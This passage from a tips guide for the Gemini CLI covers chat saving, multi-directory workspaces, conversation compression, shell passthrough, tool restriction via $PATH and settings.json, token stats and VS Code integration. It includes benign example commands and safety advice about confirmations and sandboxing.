(Tip: For truly long-running non-interactive tasks, you might also look into Gemini CLI’s “Plan” mode or how it can generate multi-step plans without intervention. However, those are advanced topics beyond this scope. In most cases, a well-crafted single prompt via headless mode can achieve a lot.)

Tip 12: Save and Resume Chat Sessions

Quick use-case: If you’ve been debugging an issue with Gemini CLI for an hour and need to stop, you don’t have to lose the conversation context. Use /chat save to save the session. Later (even after restarting the CLI), you can use /chat resume to pick up where you left off. This way, long-running conversations can be paused and continued seamlessly.

Gemini CLI essentially has a built-in chat session manager. The commands to know are:

/chat save - Saves the current conversation state under a tag/name you provide. The tag is like a filename or key for that session. Save often if you want, it will overwrite the tag if it exists. (Using a descriptive name is helpful - e.g., chat save fix-docker-issue.)
/chat list - Lists all your saved sessions (the tags you’ve used. This helps you remember what you named previous saves.
/chat resume - Resumes the session with that tag, restoring the entire conversation context and history to how it was when saved. It’s like you never left. You can then continue chatting from that point.
/chat share - (saves to file) This is useful as you can share the entire chat with someone else who can continue the session. Almost collaboration-like.

Under the hood, these sessions are stored likely in ~/.gemini/chats/ or a similar location. They include the conversation messages and any relevant state. This feature is super useful for cases such as:

Long debugging sessions: Sometimes debugging with an AI can be a long back-and-forth. If you can’t solve it in one go, save it and come back later (maybe with a fresh mind). The AI will still “remember” everything from before, because the whole context is reloaded.
Multi-day tasks: If you’re using Gemini CLI as an assistant for a project, you might have one chat session for “Refactor module X” that spans multiple days. You can resume that specific chat each day so the context doesn’t reset daily. Meanwhile, you might have another session for “Write documentation” saved separately. Switching contexts is just a matter of saving one and resuming the other.
Team hand-off: This is more experimental, but in theory, you could share the content of a saved chat with a colleague (the saved files are likely portable). If they put it in their .gemini directory and resume, they could see the same context. The practical simpler approach for collaboration is just copying the relevant Q&A from the log and using a shared GEMINI.md or prompt, but it’s interesting to note that the session data is yours to keep.

Usage example:

1	/chat save api-upgrade

(Session saved as “api-upgrade”)

/quit

(Later, reopen CLI)

1 2	$ gemini gemini> /chat list

(Shows: api-upgrade)

1	gemini> /chat resume api-upgrade

Now the model greets you with the last exchange’s state ready. You can confirm by scrolling up that all your previous messages are present.

Pro Tip: Use meaningful tags when saving chats. Instead of /chat save session1, give it a name related to the topic (e.g. /chat save memory-leak-bug). This will help you find the right one later via /chat list. There is no strict limit announced on how many sessions you can save, but cleaning up old ones occasionally might be wise just for organization.

This feature turns Gemini CLI into a persistent advisor. You don’t lose knowledge gained in a conversation; you can always pause and resume. It’s a differentiator compared to some other AI interfaces that forget context when closed. For power users, it means you can maintain parallel threads of work with the AI. Just like you’d have multiple terminal tabs for different tasks, you can have multiple chat sessions saved and resume the one you need at any given time.

Tip 13: Multi-Directory Workspace - One Gemini, Many Folders

Quick use-case: Do you have a project split across multiple repositories or directories? You can launch Gemini CLI with access to all of them at once, so it sees a unified workspace. For example, if your frontend and backend are separate folders, you can include both so that Gemini can edit or reference files in both.

There are two ways to use multi-directory mode:

Launch flag: Use the --include-directories (or -I) flag when starting Gemini CLI. For example:

1	gemini --include-directories "../backend:../frontend"

This assumes you run the command from, say, a scripts directory and want to include two sibling folders. You provide a colon-separated list of paths. Gemini CLI will then treat all those directories as part of one big workspace.

Persistent setting: In your settings.json, you can define "includeDirectories": ["path1", "path2", [...]](https://www.philschmid.de/gemini-cli-cheatsheet#:~:text=,61AFEF%22%2C%20%22AccentPurple). This is useful if you always want certain common directories loaded (e.g., a shared library folder that multiple projects use). The paths can be relative or absolute. Environment variables in the paths (like ~/common-utils) are allowed.

When multi-dir mode is active, the CLI’s context and tools consider files across all included locations. The > /directory show command will list which directories are in the current workspace. You can also dynamically add directories during a session with /directory add [](https://medium.com/@ferreradaniel/gemini-cli-free-ai-tool-upgrade-5-new-features-you-need-right-now-04cfefac5e93#:~:text=How%20to%20add%20multiple%20directories,step) - it will then load that on the fly (potentially scanning it for context like it does on startup).

Why use multi-directory mode? In microservice architectures or modular codebases, it’s common that one piece of code lives in one repo and another piece in a different repo. If you only ran Gemini in one, it wouldn’t “see” the others. By combining them, you enable cross-project reasoning. For example, you could ask, “Update the API client in the frontend to match the backend’s new API endpoints” - Gemini can open the backend folder to see the API definitions and simultaneously open the frontend code to modify it accordingly. Without multi-dir, you’d have to do one side at a time and manually carry info over.

Example: Let’s say you have client/ and server/. You start:

1 2	cd client gemini --include-directories "../server"

Now at the gemini> prompt, if you do > !ls, you’ll see it can list files in both client and server (it might show them as separate paths). You could do:

1	Open server/routes/api.py and client/src/api.js side by side to compare function names.

The AI will have access to both files. Or you might say:

1	The API changed: the endpoint "/users/create" is now "/users/register". Update both backend and frontend accordingly.

It can simultaneously create a patch in the backend route and adjust the frontend fetch call.

Under the hood, Gemini merges the file index of those directories. There might be some performance considerations if each directory is huge, but generally it handles multiple small-medium projects fine. The cheat sheet notes that this effectively creates one workspace with multiple roots.

Tip within a tip: Even if you don’t use multi-dir all the time, know that you can still reference files across the filesystem by absolute path in prompts (@/path/to/file). However, without multi-dir, Gemini might not have permission to edit those or know to load context from them proactively. Multi-dir formally includes them in scope so it’s aware of all files for tasks like search or code generation across the whole set.

Remove directories: If needed, /directory remove (or a similar command) can drop a directory from the workspace. This is less common, but maybe if you included something accidentally, you can remove it.

In summary, multi-directory mode unifies your context. It’s a must-have for polyrepo projects or any situation where code is split up. It makes Gemini CLI act more like an IDE that has your entire solution open. As a pro user, this means no part of your project is out of the AI’s reach.

Tip 14: Organize and Clean Up Your Files with AI Assistance

Quick use-case: Tired of a messy Downloads folder or disorganized project assets? You can enlist Gemini CLI to act as a smart organizer. By providing it an overview of a directory, it can classify files and even move them into subfolders (with your approval). For instance, “Clean up my Downloads: move images to an Images folder, PDFs to Documents, and delete temporary files.”

Because Gemini CLI can read file names, sizes, and even peek into file contents, it can make informed decisions about file organization. One community-created tool dubbed “Janitor AI” showcases this: it runs via Gemini CLI to categorize files as important vs junk, and groups them accordingly. The process involved scanning the directory, using Gemini’s reasoning on filenames and metadata (and content if needed), then moving files into categories. Notably, it didn’t automatically delete junk - rather, it moved them to a Trash folder for review.

Here’s how you might replicate such a workflow with Gemini CLI manually:

Survey the directory: Use a prompt to have Gemini list and categorize. For example:

1	List all files in the current directory and categorize them as "images", "videos", "documents", "archives", or "others".

Gemini might use !ls or similar to get the file list, then analyze the names/extensions to produce categories.

Plan the organization: Ask Gemini how it would like to reorganize. For example:

1	Propose a new folder structure for these files. I want to separate by type (Images, Videos, Documents, etc.). Also identify any files that seem like duplicates or unnecessary.

The AI might respond with a plan: e.g., *”Create folders: Images/, Videos/, Documents/, Archives/. Move X.png, Y.jpg to Images/; move A.mp4 to Videos/; etc. The file temp.txt looks unnecessary (maybe a temp file).”*

Execute moves with confirmation: You can then instruct it to carry out the plan. It may use shell commands like mv for each file. Since this modifies your filesystem, you’ll get confirmation prompts for each (unless you YOLO it). Carefully approve the moves. After completion, your directory will be neatly organized as suggested.

Throughout, Gemini’s natural language understanding is key. It can reason, for instance, that IMG_001.png is an image or that presentation.pdf is a document, even if not explicitly stated. It can even open an image (using its vision capability) to see what’s in it - e.g., differentiating between a screenshot vs a photo vs an icon - and name or sort it accordingly.

Renaming files by content: A particularly magical use is having Gemini rename files to be more descriptive. The Dev Community article “7 Insane Gemini CLI Tips” describes how Gemini can scan images and automatically rename them based on their content. For example, a file named IMG_1234.jpg might be renamed to login_screen.jpg if the AI sees it’s a screenshot of a login screen. To do this, you could prompt:

1	For each .png image here, look at its content and rename it to something descriptive.

Gemini will open each image (via vision tool), get a description, then propose a mv IMG_1234.png login_screen.png action. This can dramatically improve the organization of assets, especially in design or photo folders.

Two-pass approach: The Janitor AI discussion noted a two-step process: first broad categorization (important vs junk vs other), then refining groups. You can emulate this: first separate files that likely can be deleted (maybe large installer .dmg files or duplicates) from those to keep. Then focus on organizing the keepers. Always double-check what the AI flags as junk; its guess might not always be right, so manual oversight is needed.

Safety tip: When letting the AI loose on file moves or deletions, have backups or at least be ready to undo (with /restore or your own backup). It’s wise to do a dry-run: ask Gemini to print the commands it would run to organize, without executing them, so you can review. For instance: “List the mv and mkdir commands needed for this plan, but don’t execute them yet.” Once you review the list, you can either copy-paste execute them, or instruct Gemini to proceed.

This is a prime example of using Gemini CLI for “non-obvious” tasks - it’s not just writing code, it’s doing system housekeeping with AI smarts. It can save time and bring a bit of order to chaos. After all, as developers we accumulate clutter (logs, old scripts, downloads), and an AI janitor can be quite handy.

Tip 15: Compress Long Conversations to Stay Within Context

Quick use-case: If you’ve been chatting with Gemini CLI for a long time, you might hit the model’s context length limit or just find the session getting unwieldy. Use the /compress command to summarize the conversation so far, replacing the full history with a concise summary. This frees up space for more discussion without starting from scratch.

Large language models have a fixed context window (Gemini 2.5 Pro’s is very large, but not infinite). If you exceed it, the model may start forgetting earlier messages or lose coherence. The /compress feature is essentially an AI-generated tl;dr of your session that keeps important points.

How it works: When you type /compress, Gemini CLI will take the entire conversation (except system context) and produce a summary. It then replaces the chat history with that summary as a single system or assistant message, preserving essential details but dropping minute-by-minute dialogue. It will indicate that compression happened. For example, after /compress, you might see something like:

-– Conversation compressed -–
Summary of discussion: The user and assistant have been debugging a memory leak in an application. Key points: The issue is likely in DataProcessor.js, where objects aren’t being freed. The assistant suggested adding logging and identified a possible infinite loop. The user is about to test a fix.
-– End of summary -–

From that point on, the model only has that summary (plus new messages) as context for what happened before. This usually is enough if the summary captured the salient info.

When to compress: Ideally before you hit the limit. If you notice the session is getting lengthy (several hundred turns or a lot of code in context), compress proactively. The cheat sheet mentions an automatic compression setting (e.g., compress when context exceeds 60% of max). If you enable that, Gemini might auto-compress and let you know. Otherwise, manual /compress is in your toolkit.

After compressing: You can continue the conversation normally. If needed, you can compress multiple times in a very long session. Each time, you lose some granularity, so don’t compress too frequently for no reason - you might end up with an overly brief remembrance of a complex discussion. But generally the model’s own summarization is pretty good at keeping the key facts (and you can always restate anything critical yourself).

Context window example: Let’s illustrate. Suppose you fed in a large codebase by referencing many files and had a 1M token context (the max). If you then want to shift to a different part of the project, rather than starting a new session (losing all that understanding), you could compress. The summary will condense the knowledge gleaned from the code (like “We loaded modules A, B, C. A has these functions… B interacts with C in these ways…”). Now you can proceed to ask about new things with that knowledge retained abstractly.

Memory vs Compression: Note that compression doesn’t save to long-term memory, it’s local to the conversation. If you have facts you never want lost, consider Tip 4 (adding to /memory) - because memory entries will survive compression (they’ll just be reinserted anyway since they are in GEMINI.md context). Compression is more about ephemeral chat content.

A minor caution: after compression, the AI’s style might slightly change because it’s effectively seeing a “fresh” conversation with a summary. It might reintroduce itself or change tone. You can instruct it like “Continue from here… (we compressed)” to smooth it out. In practice, it often continues fine.

To summarize (pun intended), use /compress as your session grows long to maintain performance and relevance. It helps Gemini CLI focus on the bigger picture instead of every detail of the conversation’s history. This way, you can have marathon debugging sessions or extensive design discussions without running out of the “mental paper” the AI is writing on.

Tip 16: Passthrough Shell Commands with `!` (Talk to Your Terminal)

Quick use-case: At any point in a Gemini CLI session, you can run actual shell commands by prefixing them with !. For example, if you want to check the git status, just type !git status and it will execute in your terminal. This saves you from switching windows or context - you’re still in the Gemini CLI, but you’re essentially telling it “let me run this command real quick.”

This tip is about Shell Mode in Gemini CLI. There are two ways to use it:

Single command: Just put ! at the start of your prompt, followed by any command and arguments. This will execute that command in the current working directory and display the output in-line. For example:

1	!ls -lh src/

will list the files in the src directory, outputting something like you’d see in a normal terminal. After the output, the Gemini prompt returns so you can continue chatting or issue more commands.

Persistent shell mode: If you enter ! alone and hit Enter, Gemini CLI switches into a sub-mode where you get a shell prompt (often it looks like shell> or similar. Now you can type multiple shell commands interactively. It’s basically a mini-shell within the CLI. You exit this mode by typing ! on an empty line again (or exit). For instance:

!
shell> pwd
/home/alice/project
shell> python --version
Python 3.x.x
shell> !

After the final !, you’re back to the normal Gemini prompt.

Why is this useful? Because development is a mix of actions and inquiries. You might be discussing something with the AI and realize you need to compile the code or run tests to see something. Instead of leaving the conversation, you can quickly do it and feed the result back into the chat. In fact, Gemini CLI often does this for you as part of its tool usage (it might automatically run !pytest when you ask to fix tests, for example). But as the user, you have full control to do it manually too.

Examples:

After Gemini suggests a fix in code, you can do !npm run build to see if it compiles, then copy any errors and ask Gemini to help with those.
If you want to open a file in vim or nano, you could even launch it via !nano filename (though note that since Gemini CLI has its own interface, using an interactive editor inside it might be a bit awkward - better to use the built-in editor integration or copy to your editor).
You can use shell commands to gather info for the AI: e.g., !grep TODO -R . to find all TODOs in the project, then you might ask Gemini to help address those TODOs.
Or simply use it for environment tasks: !pip install some-package if needed, etc., without leaving the CLI.

Seamless interplay: One cool aspect is how the conversation can refer to outputs. For example, you could do !curl http://example.com to fetch some data, see the output, then immediately say to Gemini, “Format the above output as JSON” - since the output was printed in the chat, the AI has it in context to work with (provided it’s not too large).

Terminal as a default shell: If you find yourself always prefacing commands with !, you can actually make the shell mode persistent by default. One way is launching Gemini CLI with a specific tool mode (there’s a concept of default tool). But easier: just drop into shell mode (! with nothing) at session start if you plan to run a lot of manual commands and only occasionally talk to AI. Then you can exit shell mode whenever you want to ask a question. It’s almost like turning Gemini CLI into your normal terminal that happens to have an AI readily available.

Integration with AI planning: Sometimes Gemini CLI itself will propose to run a shell command. If you approve, it effectively does the same as !command. Understanding that, you know you can always intervene. If Gemini is stuck or you want to try something, you don’t have to wait for it to suggest - you can just do it and then continue.

In summary, the ! passthrough means you don’t have to leave Gemini CLI for shell tasks. It collapses the boundary between chatting with the AI and executing commands on your system. As a pro user, this is fantastic for efficiency - your AI and your terminal become one continuous environment.

Tip 17: Treat Every CLI Tool as a Potential Gemini Tool

Quick use-case: Realize that Gemini CLI can leverage any command-line tool installed on your system as part of its problem-solving. The AI has access to the shell, so if you have cURL, ImageMagick, git, Docker, or any other tool, Gemini can invoke it when appropriate. In other words, your entire $PATH is the AI’s toolkit. This greatly expands what it can do - far beyond its built-in tools.

For example, say you ask: “Convert all PNG images in this folder to WebP format.” If you have ImageMagick’s convert utility installed, Gemini CLI might plan something like: use a shell loop with convert command for each file. Indeed, one of the earlier examples from a blog showed exactly this, where the user prompted to batch-convert images, and Gemini executed a shell one-liner with the convert tool.

Another scenario: “Deploy my app to Docker.” If Docker CLI is present, the AI could call docker build and docker run steps as needed. Or “Use FFmpeg to extract audio from video.mp4“ - it can construct the ffmpeg command.

This tip is about mindset: Gemini isn’t limited to what’s coded into it (which is already extensive). It can figure out how to use other programs available to achieve a goal. It knows common syntax and can read help texts if needed (it could call --help on a tool). The only limitation is safety: by default, it will ask confirmation for any run_shell_command it comes up with. But as you become comfortable, you might allow certain benign commands automatically (see YOLO or allowed-tools config).

Be mindful of the environment: “With great power comes great responsibility.” Since every shell tool is fair game, you should ensure that your $PATH doesn’t include anything you wouldn’t want the AI to run inadvertently. This is where Tip 19 (custom PATH) comes in - some users create a restricted $PATH for Gemini, so it can’t, say, directly call system destructive commands or maybe not call gemini recursively (to avoid loops). The point is, by default if gcc or terraform or anything is in $PATH, Gemini could invoke it. It doesn’t mean it will randomly do so - only if the task calls for it - but it’s possible.

Train of thought example: Imagine you ask Gemini CLI: “Set up a basic HTTP server that serves the current directory.” The AI might think: “I can use Python’s built-in server for this.” It then issues !python3 -m http.server 8000. Now it just used a system tool (Python) to launch a server. That’s an innocuous example. Another: “Check the memory usage on this Linux system.” The AI might use the free -h command or read from /proc/meminfo. It’s effectively doing what a sysadmin would do, by using available commands.

All tools are extensions of the AI: This is somewhat futuristic, but consider that any command-line program can be seen as a “function” the AI can call to extend its capability. Need to solve a math problem? It could call bc (calculator). Need to manipulate an image? It could call an image processing tool. Need to query a database? If the CLI client is installed and credentials are there, it can use it. The possibilities are expansive. In other AI agent frameworks, this is known as tool use, and Gemini CLI is designed with a lot of trust in its agent to decide the right tool.

When it goes wrong: The flip side is if the AI misunderstands a tool or has a hallucination about one. It might try to call a command that doesn’t exist, or use wrong flags, resulting in errors. This isn’t a big deal - you’ll see the error and can correct or clarify. In fact, the system prompt of Gemini CLI likely guides it to first do a dry-run (just propose the command) rather than executing blindly. So you often get a chance to catch these. Over time, the developers are improving the tool selection logic to reduce these missteps.

The main takeaway is to think of Gemini CLI as having a very large Swiss Army knife - not just the built-in blades, but every tool in your OS. You don’t have to instruct it on how to use them if it’s something standard; usually it knows or can find out. This significantly amplifies what you can accomplish. It’s like having a junior dev or devops engineer who knows how to run pretty much any program you have installed.

As a pro user, you can even install additional CLI tools specifically to give Gemini more powers. For example, if you install a CLI for a cloud service (AWS CLI, GCloud CLI, etc.), in theory Gemini can utilize it to manage cloud resources if prompted to. Always ensure you understand and trust the commands run, especially with powerful tools (you wouldn’t want it spinning up huge cloud instances accidentally). But used wisely, this concept - everything is a Gemini tool - is what makes it exponentially more capable as you integrate it into your environment.

Tip 18: Utilize Multimodal AI - Let Gemini See Images and More

Quick use-case: Gemini CLI isn’t limited to text - it’s multimodal. This means it can analyze images, diagrams, or even PDFs if given. Use this to your advantage. For instance, you could say “Here’s a screenshot of an error dialog, @./error.png - help me troubleshoot this.” The AI will “see” the image and respond accordingly.

One of the standout features of Google’s Gemini model (and its precursor PaLM2 in Codey form) is image understanding. In Gemini CLI, if you reference an image with @, the model receives the image data. It can output descriptions, classifications, or reason about the image’s content. We already discussed renaming images by content (Tip 14) and describing screenshots (Tip 7). But let’s consider other creative uses:

UI/UX feedback: If you’re a developer working with designers, you can drop a UI image and ask Gemini for feedback or to generate code. “Look at this UI mockup @mockup.png and produce a React component structure for it.” It could identify elements in the image (header, buttons, etc.) and outline code.
Organizing images: Beyond renaming, you might have a folder of mixed images and want to sort by content. “Sort the images in ./photos/ into subfolders by theme (e.g., sunsets, mountains, people).” The AI can look at each photo and categorize it (this is similar to what some photo apps do with AI - now you can do it with your own script via Gemini).
OCR and data extraction: If you have a screenshot of error text or a photo of a document, Gemini can often read the text from it. For example, “Extract the text from invoice.png and put it into a structured format.” As shown in a Google Cloud blog example, Gemini CLI can process a set of invoice images and output a table of their info. It basically did OCR + understanding to get invoice numbers, dates, amounts from pictures of invoices. That’s an advanced use-case but entirely possible with the multimodal model under the hood.
Understanding graphs or charts: If you have a graph screenshot, you could ask “Explain this chart’s key insights @chart.png.” It might interpret the axes and trends. Accuracy can vary, but it’s a nifty try.

To make this practical: when you @image.png, ensure the image isn’t too huge (though the model can handle reasonably large images). The CLI will likely encode it and send it to the model. The response might include descriptions or further actions. You can mix text and image references in one prompt too.

Non-image modalities: The CLI and model potentially can handle PDFs and audio too, by converting them via tools. For example, if you @report.pdf, Gemini CLI might use a PDF-to-text tool under the hood to extract text and then summarize. If you @audio.mp3 and ask for a transcript, it might use an audio-to-text tool (like a speech recognition function). The cheat sheet suggests referencing PDFs, audio, video files is supported, presumably by invoking appropriate internal tools or APIs. So, “transcribe this interview audio: @interview.wav“ could actually work (if not now, likely soon, since underlying Google APIs for speech-to-text could be plugged in).

Rich outputs: Multimodal also means the AI can return images in responses if integrated (though in CLI it usually won’t display them directly, but it could save an image file or output ASCII art, etc.). The MCP capability mentioned that tools can return images. For instance, an AI drawing tool could generate an image and Gemini CLI could present it (maybe by opening it or giving a link).

Important: The CLI itself is text-based, so you won’t see the image in the terminal (unless it’s capable of ASCII previews). You’ll just get the analysis. So this is mostly about reading images, not displaying them. If you’re in VS Code integration, it might show images in the chat view.

In summary, don’t forget the “I” in GUI when using Gemini CLI - it can handle the visual just as well as the textual in many cases. This opens up workflows like visual debugging, design help, data extraction from screenshots, etc., all under the same tool. It’s a differentiator that some other CLI tools may not have yet. And as models improve, this multimodal support will only get more powerful, so it’s a future-proof skill to exploit.

Tip 19: Customize the `$PATH` (and Tool Availability) for Stability

Quick use-case: If you ever find Gemini CLI getting confused or invoking the wrong programs, consider running it with a tailored $PATH. By limiting or ordering the available executables, you can prevent the AI from, say, calling a similarly named script that you didn’t intend. Essentially, you sandbox its tool access to known-good tools.

For most users, this isn’t an issue, but for pro users with lots of custom scripts or multiple versions of tools, it can be helpful. One reason mentioned by the developers is avoiding infinite loops or weird behavior. For example, if gemini itself is in $PATH, an AI gone awry might recursively call gemini from within Gemini (a strange scenario, but theoretically possible). Or perhaps you have a command named test that conflicts with something - the AI might call the wrong one.

How to set PATH for Gemini: Easiest is inline on launch:

1	PATH=/usr/bin:/usr/local/bin gemini

This runs Gemini CLI with a restricted $PATH of just those directories. You might exclude directories where experimental or dangerous scripts lie. Alternatively, create a small shell script wrapper that purges or adjusts $PATH then exec’s gemini.

Another approach is using environment or config to explicitly disable certain tools. For instance, if you absolutely never want the AI to use rm or some destructive tool, you could technically create an alias or dummy rm in a safe $PATH that does nothing (though this could interfere with normal operations, so maybe not that one). A better method is the exclude list in settings. In an extension or settings.json, you can exclude tool names. E.g.,

1	"excludeTools": ["run_shell_command"]

This extreme example would stop all shell commands from running (making Gemini effectively read-only). More granular, there was mention of skipping confirmation for some; similarly you might configure something like:

1
2
3

"tools": {
  "exclude": ["apt-get", "shutdown"]
}

(This syntax is illustrative; consult docs for exact usage.)

The principle is, by controlling the environment, you reduce risk of the AI doing something dumb with a tool it shouldn’t. It’s akin to child-proofing the house.

Prevent infinite loops: One user scenario was a loop where Gemini kept reading its own output or re-reading files repeatedly. Custom $PATH can’t directly fix logic loops, but one cause could be if the AI calls a command that triggers itself. Ensuring it can’t accidentally spawn another AI instance (like calling bard or gemini command, if it thought to do so) is good. Removing those from $PATH (or renaming them for that session) helps.

Isolation via sandbox: Another alternative to messing with $PATH is using --sandbox mode (which uses Docker or Podman to run tools in an isolated environment). In that case, the AI’s actions are contained and have only the tools that sandbox image provides. You could supply a Docker image with a curated set of tools. This is heavy-handed but very safe.

Custom PATH for specific tasks: You might have different $PATH setups for different projects. For example, in one project you want it to use a specific version of Node or a local toolchain. Launching gemini with the $PATH that points to those versions will ensure the AI uses the right one. Essentially, treat Gemini CLI like any user - it uses whatever environment you give it. So if you need it to pick gcc-10 vs gcc-12, adjust $PATH or CC env var accordingly.

In summary: Guard rails. As a power user, you have the ability to fine-tune the operating conditions of the AI. If you ever find a pattern of undesirable behavior tied to tool usage, tweaking $PATH is a quick remedy. For everyday use, you likely won’t need this, but it’s a pro tip to keep in mind if you integrate Gemini CLI into automation or CI: give it a controlled environment. That way, you know exactly what it can and cannot do, which increases reliability.

Tip 20: Track and reduce token spend with token caching and stats

If you run long chats or repeatedly attach the same big files, you can cut cost and latency by turning on token caching and monitoring usage. With an API key or Vertex AI auth, Gemini CLI automatically reuses previously sent system instructions and context, so follow‑up requests are cheaper. You can see the savings live in the CLI.

How to use it

Use an auth mode that enables caching. Token caching is available when you authenticate with a Gemini API key or Vertex AI. It is not available with OAuth login today. Google Gemini

Inspect your usage and cache hits. Run the stats command during a session. It shows total tokens and a cached field when caching is active.

/stats

The command’s description and cached reporting behavior are documented in the commands reference and FAQ. Google Gemini+1

Capture metrics in scripts. When running headless, output JSON and parse the stats block, which includes tokens.cached for each model:

1	gemini -p "Summarize README" --output-format json

The headless guide documents the JSON schema with cached token counts. Google Gemini

Save a session summary to file: For CI or budget tracking, write a JSON session summary to disk.

1	gemini -p "Analyze logs" --session-summary usage.json

This flag is listed in the changelog. Google Gemini

With API key or Vertex auth, the CLI automatically reuses previously sent context so later turns send fewer tokens. Keeping GEMINI.md and large file references stable across turns increases cache hits; you’ll see that reflected in stats as cached tokens.

Tip 21: Use `/copy` for Quick Clipboard Copy

Quick use-case: Instantly copy the latest answer or code snippet from Gemini CLI to your system clipboard, without any extraneous formatting or line numbers. This is perfect for quickly pasting AI-generated code into your editor or sharing a result with a teammate.

When Gemini CLI provides an answer (especially a multi-line code block), you often want to reuse it elsewhere. The /copy slash command makes this effortless by copying the last output produced by the CLI directly to your clipboard. Unlike manual selection (which can grab line numbers or prompt text), /copy grabs only the raw response content. For example, if Gemini just generated a 50-line Python script, simply typing /copy will put that entire script into your clipboard, ready to paste - no need to scroll and select text. Under the hood, Gemini CLI uses the appropriate clipboard utility for your platform (e.g. pbcopy on macOS, clip on Windows. Once you run the command, you’ll typically see a confirmation message, and then you can paste the copied text wherever you need it.

How it works: The /copy command requires that your system has a clipboard tool available. On macOS and Windows, the required tools (pbcopy and clip respectively) are usually pre-installed. On Linux, you may need to install xclip or xsel for /copy to function. After ensuring that, you can use /copy anytime after Gemini CLI prints an answer. It will capture the entire last response (even if it’s long) and omit any internal numbering or formatting the CLI may show on-screen. This saves you from dealing with unwanted artifacts when transferring the content. It’s a small feature, but a huge time-saver when you’re iterating on code or compiling a report generated by the AI.

Pro Tip: If you find the /copy command isn’t working, double-check that your clipboard utilities are installed and accessible. For instance, Ubuntu users should run sudo apt install xclip to enable clipboard copying. Once set up, /copy lets you share Gemini’s outputs with zero friction - copy, paste, and you’re done.

Tip 22: Master `Ctrl+C` for Shell Mode and Exiting

Quick use-case: Cleanly interrupt Gemini CLI or exit shell mode with a single keypress - and quit the CLI entirely with a quick double-tap - thanks to the versatile Ctrl+C shortcut. This gives you immediate control when you need to stop or exit.

Gemini CLI operates like a REPL, and knowing how to break out of operations is essential. Pressing Ctrl+C once will cancel the current action or clear any input you’ve started typing, essentially acting as an “abort” command. For example, if the AI is generating a lengthy answer and you’ve seen enough, hit Ctrl+C - the generation stops immediately. If you had started typing a prompt but want to discard it, Ctrl+C will wipe the input line so you can start fresh. Additionally, if you are in shell mode (activated by typing ! to run shell commands), a single Ctrl+C will exit shell mode and return you to the normal Gemini prompt (it sends an interrupt to the shell process running. This is extremely handy if a shell command is hanging or you simply want to get back to AI mode.

Pressing Ctrl+C twice in a row is the shortcut to exit Gemini CLI entirely. Think of it as “Ctrl+C to cancel, and Ctrl+C again to quit.” This double-tap signals the CLI to terminate the session (you’ll see a goodbye message or the program will close). It’s a faster alternative to typing /quit or closing the terminal window, allowing you to gracefully shut down the CLI from the keyboard. Do note that a single Ctrl+C will not quit if there’s input to clear or an operation to interrupt - it requires that second press (when the prompt is idle) to fully exit. This design prevents accidentally closing the session when you only meant to stop the current output.

Pro Tip: In shell mode, you can also press the Esc key to leave shell mode and return to Gemini’s chat mode without terminating the CLI. And if you prefer a more formal exit, the /quit command is always available to cleanly end the session. Lastly, Unix users can use Ctrl+D (EOF) at an empty prompt to exit as well - Gemini CLI will prompt for confirmation if needed. But for most cases, mastering the single- and double-tap of Ctrl+C is the quickest way to stay in control.

Tip 23: Customize Gemini CLI with `settings.json`

Quick use-case: Adapt the CLI’s behavior and appearance to your preferences or project conventions by editing the settings.json config file, instead of sticking with one-size-fits-all defaults. This lets you enforce things like theme, tool usage rules, or editor mode across all your sessions.

Gemini CLI is highly configurable. In your home directory (~/.gemini/) or project folder (.gemini/ within your repo), you can create a settings.json file to override default settings. Nearly every aspect of the CLI can be tuned here - from visual theme to tool permissions. The CLI merges settings from multiple levels: system-wide defaults, your user settings, and project-specific settings (project settings override user settings. For example, you might have a global preference for a dark theme, but a particular project might require stricter tool sandboxing; you can handle this via different settings.json files at each level.

Inside settings.json, options are specified as JSON key-value pairs. Here’s a snippet illustrating some useful customizations:

{
"theme": "GitHub",
"autoAccept": false,
"vimMode": true,
"sandbox": "docker",
"includeDirectories": ["../shared-library", "~/common-utils"],
"usageStatisticsEnabled": true
}

In this example, we set the theme to “GitHub” (a popular color scheme), disable autoAccept (so the CLI will always ask before running potentially altering tools), enable Vim keybindings for the input editor, and enforce using Docker for tool sandboxing. We also added some directories to the workspace context (includeDirectories) so Gemini can see code in shared paths by default. Finally, we kept usageStatisticsEnabled true to collect basic usage stats (which feeds into telemetry, if enabled. There are many more settings available - like defining custom color themes, adjusting token limits, or whitelisting/blacklisting specific tools - all documented in the configuration guide. By tailoring these, you ensure Gemini CLI behaves optimally for your workflow (for instance, some developers always want vimMode on for efficiency, while others might prefer the default editor).

One convenient way to edit settings is via the built-in settings UI. Run the command /settings in Gemini CLI, and it will open an interactive editor for your configuration. This interface lets you browse and search settings with descriptions, and prevents JSON syntax errors by validating inputs. You can tweak colors, toggle features like yolo (auto-approval), adjust checkpointing (file save/restore behavior), and more through a friendly menu. Changes are saved to your settings.json, and some take effect immediately (others might require restarting the CLI).

Pro Tip: Maintain separate project-specific settings.json files for different needs. For example, on a team project you might set "sandbox": "docker" and "excludeTools": ["run_shell_command"] to lock down dangerous operations, while your personal projects might allow direct shell commands. Gemini CLI will automatically pick up the nearest .gemini/settings.json in your project directory tree and merge it with your global ~/.gemini/settings.json. Also, don’t forget you can quickly adjust visual preferences: try /theme to interactively switch themes without editing the file, which is great for finding a comfortable look. Once you find one, put it in settings.json to make it permanent.

Tip 24: Leverage IDE Integration (VS Code) for Context & Diffs

Quick use-case: Supercharge Gemini CLI by hooking it into VS Code - the CLI will automatically know which files you’re working on and even open AI-proposed code changes in VS Code’s diff editor for you. This creates a seamless loop between AI assistant and your coding workspace.

One of Gemini CLI’s powerful features is its IDE integration with Visual Studio Code. By installing the official Gemini CLI Companion extension in VS Code and connecting it, you allow Gemini CLI to become “context-aware” of your editor. What does this mean in practice? When connected, Gemini knows about the files you have open, your current cursor location, and any text you’ve selected in VS Code. All that information is fed into the AI’s context. So if you ask, “Explain this function,” Gemini CLI can see the exact function you’ve highlighted and give a relevant answer, without you needing to copy-paste code into the prompt. The integration shares up to your 10 most recently opened files, plus selection and cursor info, giving the model a rich understanding of your workspace.

Another huge benefit is native diffing of code changes. When Gemini CLI suggests modifications to your code (for example, “refactor this function” and it produces a patch), it can open those changes in VS Code’s diff viewer automatically. You’ll see a side-by-side diff in VS Code showing the proposed edits. You can then use VS Code’s familiar interface to review the changes, make any manual tweaks, and even accept the patch with a click. The CLI and editor stay in sync - if you accept the diff in VS Code, Gemini CLI knows and continues the session with those changes applied. This tight loop means you no longer have to copy code from the terminal to your editor; the AI’s suggestions flow straight into your development environment.

